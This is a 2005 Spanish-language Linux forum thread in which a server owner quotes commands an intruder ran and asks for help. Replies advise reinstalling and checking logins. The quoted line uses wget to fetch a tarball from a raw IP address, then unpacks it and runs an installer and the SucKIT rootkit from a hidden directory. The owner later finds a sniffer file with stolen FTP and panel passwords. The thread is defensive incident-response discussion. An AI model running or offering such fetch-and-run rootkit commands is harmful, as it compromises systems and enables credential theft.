Foros del Web » Administración de Sistemas » Unix / Linux »

Descifrar 2 lineas

Estas en el tema de Descifrar 2 lineas en el foro de Unix / Linux en Foros del Web. Hola, me he encontrado con que alguien ha introducido estos comandos: mkdir ... cd ... wget http://66.185.162.241/...fusao/sk.tar.gz;tar -zxvf sk.tar.gz;cd sk1.3a;chmod 777 *;./inst;cd /usr/local/.games;./sk ifconfig iptables ...
  #1 (permalink)  
Antiguo 20/09/2005, 12:25
 
Fecha de Ingreso: octubre-2004
Mensajes: 132
Antigüedad: 20 años, 2 meses
Puntos: 0
Descifrar 2 lineas

Hola, me he encontrado con que alguien ha introducido estos comandos:

mkdir ...
cd ...
wget http://66.185.162.241/...fusao/sk.tar.gz;tar -zxvf sk.tar.gz;cd sk1.3a;chmod 777 *;./inst;cd /usr/local/.games;./sk
ifconfig
iptables -L

Me temo lo peor, ¿alguien ha instalado el suckit? ¿que puedo hacer si lo ha hecho?

Gracias
  #2 (permalink)  
Antiguo 20/09/2005, 12:32
Avatar de ociomax
Colaborador
 
Fecha de Ingreso: mayo-2002
Ubicación: Temuco, Chile
Mensajes: 5.595
Antigüedad: 22 años, 6 meses
Puntos: 35
Si los permisos de /usr/local están correctamente seteados, y si tu sistema está correctamente actualizado, entonces no deberías tener problemas. A menos, obviamente, que ese "alguien" haya ejecutado lo anterior como root. En ese caso, simplemente reinstala (¿tienes backups, verdad?).
__________________
Christian González, "OCIOMax"
http://chgonzalez.blogspot.com
http://twitter.com/chgonzalez
  #3 (permalink)  
Antiguo 20/09/2005, 12:39
Avatar de Koveart
Colaborador
 
Fecha de Ingreso: julio-2002
Ubicación: Colombia
Mensajes: 4.407
Antigüedad: 22 años, 5 meses
Puntos: 29
Si aun existe el codigo fuente miralo a ver qué hace y puedes tomar decisiones en base a la peligrosidad del codigo para la estabilidad del sistema.

Saludos
__________________
“Los soñadores no existen, se lo dice un soñador que ha tenido el privilegio de ver realidades que ni siquiera fue capaz de soñar”
  #4 (permalink)  
Antiguo 21/09/2005, 08:32
 
Fecha de Ingreso: octubre-2004
Mensajes: 132
Antigüedad: 20 años, 2 meses
Puntos: 0
Pues me temo que estoy infectado. Han instalado el suckit, me he encontrado 1 archivo llamado .sniffer con claves ftp, del panel de control...

¿Hay alguna manera de conocer la IP de quien ha escrito esos comandos?

Gracias, un saludo.
  #5 (permalink)  
Antiguo 21/09/2005, 08:38
Avatar de Koveart
Colaborador
 
Fecha de Ingreso: julio-2002
Ubicación: Colombia
Mensajes: 4.407
Antigüedad: 22 años, 5 meses
Puntos: 29
Escribe el comando last para ver las ultimas conexiones a tu máquina.

saludos
__________________
“Los soñadores no existen, se lo dice un soñador que ha tenido el privilegio de ver realidades que ni siquiera fue capaz de soñar”
  #6 (permalink)  
Antiguo 21/09/2005, 09:09
Avatar de ociomax
Colaborador
 
Fecha de Ingreso: mayo-2002
Ubicación: Temuco, Chile
Mensajes: 5.595
Antigüedad: 22 años, 6 meses
Puntos: 35
Si el que hizo esto es medianamente inteligente, entonces no te servirá de nada averiguar la IP, ya que seguramente la habrá falseado.

Mejor reinstala desde cero, usando una distro religiosamente actualizada; luego refuerza tus mecanismos de seguridad.
__________________
Christian González, "OCIOMax"
http://chgonzalez.blogspot.com
http://twitter.com/chgonzalez
Atención: Estás leyendo un tema que no tiene actividad desde hace más de 6 MESES, te recomendamos abrir un Nuevo tema en lugar de responder al actual.
Respuesta




La zona horaria es GMT -6. Ahora son las 21:02.